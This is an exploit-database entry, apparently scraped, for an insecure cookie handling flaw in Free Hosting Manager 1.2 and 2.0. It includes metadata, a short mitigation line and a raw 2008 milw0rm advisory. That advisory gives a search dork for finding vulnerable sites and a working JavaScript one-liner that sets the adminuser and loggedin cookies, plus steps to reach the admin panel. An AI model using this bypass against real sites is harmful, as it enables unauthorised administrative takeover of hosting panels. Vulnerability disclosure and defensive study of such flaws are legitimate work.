Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability

vendor:

Free Hosting Manager

by:

Scary-Boys

7.5

CVSS

HIGH

Insecure Cookie Handling

614

CWE

Product Name: Free Hosting Manager

Affected Version From: 1.2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability

The admin panel of Free Hosting Manager 1.2 & 2.0 is vulnerable to insecure cookie handling. An attacker can set the adminuser and loggedin cookie to 1, which will give them access to the admin panel.

Mitigation:

Ensure that the application is validating the cookie values before using them.

Source

Exploit-DB raw data:

#########################################################################
#                                                                       #
#Free Hosting Manager = 1.2 & 2.0 Insecure Cookie Handling Vulnerability#
#                                                                       #
#########################################################################
#                                                                       #
# AUTHOR     : Scary-Boys                                               #
# HOME       : http://scary-boys.com                                    #
# Founded By : lvlr-Erfan                                               #
# Download   : http://www.fhm-script.com/download.php                   #
#                                                                       #
#########################################################################
#                                                                       #
#     DorKs  : "Powered By Free Hosting Manager"                        #
#                                                                       #
#########################################################################
#                                                                       #
#  DESCRIPTION :                                                        #
# the admin panel only checks if the cookie exists.                     #
#                                                                       #
#########################################################################
#                                                                       #
#  Vulnerability :                                                      #
#                                                                       #
#  javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";
#                                                                       #
#########################################################################
#                                                                       #
# after running the javascript, Go to "/admin" & Refresh      #
#                                                                       #
#########################################################################

# milw0rm.com [2008-08-06]